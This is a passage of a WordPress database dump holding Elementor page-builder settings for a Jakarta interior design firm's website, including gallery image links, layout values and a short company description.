Gallery\",\"_id\":\"0a9343c\"}],\"columns\":3,\"aspect_ratio\":\"9:16\",\"thumbnail_image_size\":\"2048x2048\",\"show_all_galleries_label\":\"All\"},\"elements\":[],\"widgetType\":\"gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(3786,4860,'_elementor_page_assets','a:0:{}'),(3787,4860,'_elementor_pro_version','3.8.1'),(3788,4861,'_wp_page_template','elementor_header_footer'),(3789,4861,'_elementor_edit_mode','builder'),(3790,4861,'_elementor_template_type','wp-page'),(3791,4861,'_elementor_version','3.8.1'),(3792,4861,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbcb47e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6cbe328\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\",\"hide_desktop\":\"hidden-desktop\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"},{\"id\":\"00d9390\",\"elType\":\"widget\",\"settings\":{\"gallery\":[{\"id\":4800,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/Office-1.jpg\"},{\"id\":4801,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-2.jpg\"},{\"id\":4803,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-3.jpg\"},{\"id\":4804,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-4.jpg\"},{\"id\":4805,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-5.jpg\"},{\"id\":4806,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-6.jpg\"},{\"id\":4807,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-7.jpg\"},{\"id\":4808,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-8.jpeg\"}],\"galleries\":[{\"gallery_title\":\"New Gallery\",\"_id\":\"17a02e1\"}],\"columns\":3,\"aspect_ratio\":\"9:16\",\"thumbnail_image_size\":\"2048x2048\",\"show_all_galleries_label\":\"All\"},\"elements\":[],\"widgetType\":\"gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(3793,4861,'_elementor_page_assets','a:0:{}'),(3794,4861,'_elementor_pro_version','3.8.1'),(3795,4861,'_elementor_css','a:6:{s:4:\"time\";i:1685437001;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3796,4862,'_wp_page_template','elementor_header_footer'),(3797,4862,'_elementor_edit_mode','builder'),(3798,4862,'_elementor_template_type','wp-page'),(3799,4862,'_elementor_version','3.8.1'),(3800,4862,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbcb47e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6cbe328\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\",\"hide_desktop\":\"hidden-desktop\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"},{\"id\":\"00d9390\",\"elType\":\"widget\",\"settings\":{\"gallery\":[{\"id\":4800,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/Office-1.jpg\"},{\"id\":4801,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-2.jpg\"},{\"id\":4803,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-3.jpg\"},{\"id\":4804,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-4.jpg\"},{\"id\":4805,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-5.jpg\"},{\"id\":4806,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-6.jpg\"},{\"id\":4807,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-7.jpg\"},{\"id\":4808,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-8.jpeg\"}],\"galleries\":[{\"gallery_title\":\"New Gallery\",\"_id\":\"17a02e1\"}],\"columns\":3,\"aspect_ratio\":\"9:16\",\"thumbnail_image_size\":\"2048x2048\",\"show_all_galleries_label\":\"All\"},\"elements\":[],\"widgetType\":\"gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(3801,4862,'_elementor_page_assets','a:0:{}'),(3802,4862,'_elementor_pro_version','3.8.1'),(3803,4862,'_elementor_css','a:6:{s:4:\"time\";i:1685437001;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3804,4863,'_wp_page_template','elementor_header_footer'),(3805,4863,'_elementor_edit_mode','builder'),(3806,4863,'_elementor_template_type','wp-page'),(3807,4863,'_elementor_version','3.8.1'),(3808,4863,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Bauhaus Office Projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"description\":\"Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.\\n\\nKami meyakini bahwa ruang kantor yang dirancang dengan baik dapat meningkatkan produktivitas serta membangun interaksi positif antar karyawan.\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbcb47e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6cbe328\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\",\"hide_desktop\":\"hidden-desktop\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"},{\"id\":\"00d9390\",\"elType\":\"widget\",\"settings\":{\"gallery\":[{\"id\":4800,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/Office-1.jpg\"},{\"id\":4801,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-2.jpg\"},{\"id\":4803,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-3.jpg\"},{\"id\":4804,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-4.jpg\"},{\"id\":4805,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-5.jpg\"},{\"id\":4806,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-6.jpg\"},{\"id\":4807,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-7.jpg\"},{\"id\":4808,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/office-8.jpeg\"}],\"galleries\":[{\"gallery_title\":\"New Gallery\",\"_id\":\"17a02e1\"}],\"columns\":3,\"aspect_ratio\":\"9:16\",\"thumbnail_image_size\":\"2048x2048\",\"show_all_galleries_label\":\"All\"},\"elements\":[],\"widgetType\":\"gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(3809,4863,'_elementor_page_assets','a:0:{}'),(3810,4863,'_elementor_pro_version','3.8.1'),(3811,4863,'_elementor_css','a:6:{s:4:\"time\";i:1685437001;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3812,560,'_elementor_css','a:6:{s:4:\"time\";i:1695371965;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3813,4681,'_elementor_css','a:6:{s:4:\"time\";i:1695371975;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3822,4865,'_wp_page_template','elementor_header_footer'),(3823,4865,'_elementor_edit_mode','builder'),(3824,4865,'_elementor_template_type','wp-page'),(3825,4865,'_elementor_version','3.8.1'),(3826,4865,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"LOREM IPSUM\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">LOREM IPSUM<\\/span><\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. <\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center 